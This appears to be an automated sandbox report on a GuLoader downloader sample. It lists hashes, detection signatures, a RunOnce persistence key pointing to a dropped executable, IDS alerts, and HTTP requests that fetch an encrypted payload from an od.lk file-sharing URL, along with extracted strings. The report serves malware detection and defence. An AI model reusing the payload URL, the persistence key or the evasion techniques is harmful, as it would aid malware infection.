
Windows Analysis Report
2Jq4fZJIJ8.exe

Overview

General Information

Sample name: 2Jq4fZJIJ8.exe (renamed because the original name is a hash value)
Original sample name: d069c61ff3b843b2ee5165f0bac7c30693f0ee9893906f984662f04eaacbee61.exe
Analysis ID: 1632358
MD5: 93c0345871a7c67079d8d8bc5d722493
SHA1: 344872f40c4f4f04b8b20f5de290bd62b678ef40
SHA256: d069c61ff3b843b2ee5165f0bac7c30693f0ee9893906f984662f04eaacbee61
Tags: exe, GuLoader, signed, user-adrian__luca

Detection

GuLoader
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious PE digital signature
Joe Sandbox ML detected suspicious sample
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • 2Jq4fZJIJ8.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\2Jq4fZJIJ8.exe" MD5: 93C0345871A7C67079D8D8BC5D722493)
    • 2Jq4fZJIJ8.exe (PID: 5284 cmdline: "C:\Users\user\Desktop\2Jq4fZJIJ8.exe" MD5: 93C0345871A7C67079D8D8BC5D722493)
  • Dropworm.exe (PID: 804 cmdline: "C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe" MD5: 93C0345871A7C67079D8D8BC5D722493)
    • Dropworm.exe (PID: 3796 cmdline: "C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe" MD5: 93C0345871A7C67079D8D8BC5D722493)
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XORed.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000000.00000002.1527552230.0000000000787000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000009.00000002.2047681752.0000000000595000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000000.00000002.1527552230.00000000007CB000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000009.00000002.2047681752.0000000000538000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000000.00000002.1528537573.0000000006497000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security

System Summary

Source: Registry Key set, Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Data: Details: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\2Jq4fZJIJ8.exe, ProcessId: 5284, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Tapestrying
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\2Jq4fZJIJ8.exe, ProcessId: 5284, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Tapestrying
Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP  Destination Port  Protocol
2025-03-07T22:50:26.469808+0100  2803270  2         Potentially Bad Traffic  192.168.2.4  49720        38.108.185.115  443               TCP
2025-03-07T22:50:33.690204+0100  2803270  2         Potentially Bad Traffic  192.168.2.4  49722        38.108.185.115  443               TCP
2025-03-07T22:50:41.041061+0100  2803270  2         Potentially Bad Traffic  192.168.2.4  49724        38.108.185.115  443               TCP
2025-03-07T22:50:57.673014+0100  2803270  2         Potentially Bad Traffic  192.168.2.4  49727        38.108.185.115  443               TCP
2025-03-07T22:51:02.778925+0100  2803270  2         Potentially Bad Traffic  192.168.2.4  49729        38.108.185.115  443               TCP
2025-03-07T22:51:10.329816+0100  2803270  2         Potentially Bad Traffic  192.168.2.4  49731        38.108.185.115  443               TCP
2025-03-07T22:51:17.869052+0100  2803270  2         Potentially Bad Traffic  192.168.2.4  49733        38.108.185.115  443               TCP
2025-03-07T22:51:19.351809+0100  2803270  2         Potentially Bad Traffic  192.168.2.4  49734        38.108.185.115  443               TCP
2025-03-07T22:51:25.069169+0100  2803270  2         Potentially Bad Traffic  192.168.2.4  49737        38.108.185.115  443               TCP

AV Detection

Source: 2Jq4fZJIJ8.exe, Avira: detected
Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe, Avira: detection malicious, Label: HEUR/AGEN.1361137
Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe, ReversingLabs: Detection: 52%
Source: 2Jq4fZJIJ8.exe, Virustotal: Detection: 65%
Source: 2Jq4fZJIJ8.exe, ReversingLabs: Detection: 52%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: 2Jq4fZJIJ8.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49727 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49725 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: 2Jq4fZJIJ8.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe, Code function: 0_2_00405FFD FindFirstFileA,FindClose, 0_2_00405FFD
Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe, Code function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_0040559B
Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe, Code function: 0_2_00402688 FindFirstFileA, 0_2_00402688
Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe, Code function: 8_2_00405FFD FindFirstFileA,FindClose, 8_2_00405FFD
Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe, Code function: 8_2_00402688 FindFirstFileA, 8_2_00402688
Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe, Code function: 8_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 8_2_0040559B
Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe, Code function: 9_2_00405FFD FindFirstFileA,FindClose, 9_2_00405FFD
Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe, Code function: 9_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 9_2_0040559B
Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe, Code function: 9_2_00402688 FindFirstFileA, 9_2_00402688
Source: Joe Sandbox View, IP Address: 38.108.185.115
Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49722 -> 38.108.185.115:443
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49733 -> 38.108.185.115:443
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49729 -> 38.108.185.115:443
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49734 -> 38.108.185.115:443
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49720 -> 38.108.185.115:443
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49724 -> 38.108.185.115:443
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49727 -> 38.108.185.115:443
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 38.108.185.115:443
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49731 -> 38.108.185.115:443
Source: global traffic, HTTP traffic detected:
    GET /d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
    Host: od.lk
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    GET /f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
    Host: od.lk
    Cache-Control: no-cache
    Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: od.lk
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Fri, 07 Mar 2025 21:50:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/7.4.33
    Cache-Control: no-cache, max-age=0, s-max-age=0, must-revalidate, no-store
    Error-Message: File is inaccessible due to account suspension.
    Error:
    X-FastCGI-Cache: MISS
    Strict-Transport-Security: max-age=63072000; includeSubDomains
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Fri, 07 Mar 2025 21:50:36 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    X-Powered-By: PHP/7.4.33
    Cache-Control: no-cache, max-age=0, s-max-age=0, must-revalidate, no-store
    Error-Message: File is inaccessible due to account suspension.
    Error:
    X-FastCGI-Cache: HIT
    Strict-Transport-Security: max-age=63072000; includeSubDomains
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/0
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/sfig2.crt0
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.starfieldtech.com/repository/1402
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfi
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldte
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfig2s1-775.crl0c
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfroot-g2.crl0L
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfroot.crl0L
            Source: Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldtex
            Source: Dropworm.exe, Dropworm.exe, 00000009.00000000.1699005074.0000000000409000.00000008.00000001.01000000.0000000E.sdmp, Dropworm.exe, 00000009.00000002.2047393619.0000000000409000.00000004.00000001.01000000.0000000E.sdmp, Dropworm.exe, 0000000C.00000002.2429535829.0000000000409000.00000008.00000001.01000000.0000000E.sdmp, 2Jq4fZJIJ8.exe, Dropworm.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: 2Jq4fZJIJ8.exe, Dropworm.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.star
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/08
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/0;
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.starfieldtech.com/0F
            Source: Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.starfieldtechZ
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.starz
            Source: Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ogp.me/ns#
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://certs.starfieldtech.com/repository/0
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1904152654.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1753723572.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2036442740.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2219815466.0000000003423000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/04c
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/211
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.2162639450.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1997320279.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2072754690.00000000033D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/?
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1663768139.00000000033DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/AppData
            Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/C
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.000000000338C000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/H
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/M:
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/T
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin)
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin-
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin.
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin2
            Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003387000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin:
            Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003387000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin=
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033A3000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.00000000033A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binF
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binH
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.000000000338C000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binM
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binP
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1945858799.00000000033D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binU
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binm
            Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003387000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binq
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033A3000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.00000000033A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binr
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bins
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/em32
            Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2147922516.000000000342D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File
            Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/l
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/o
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/od.lk/
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/or/
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://od.lk/ws
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://web.opendrive.com/api/
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1971631485.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2036334999.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1817986444.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2136016965.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1753723572.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2194439736.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2178764189.000000000341C000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://web.opendrive.com/api/branding.json?user_id=2104337
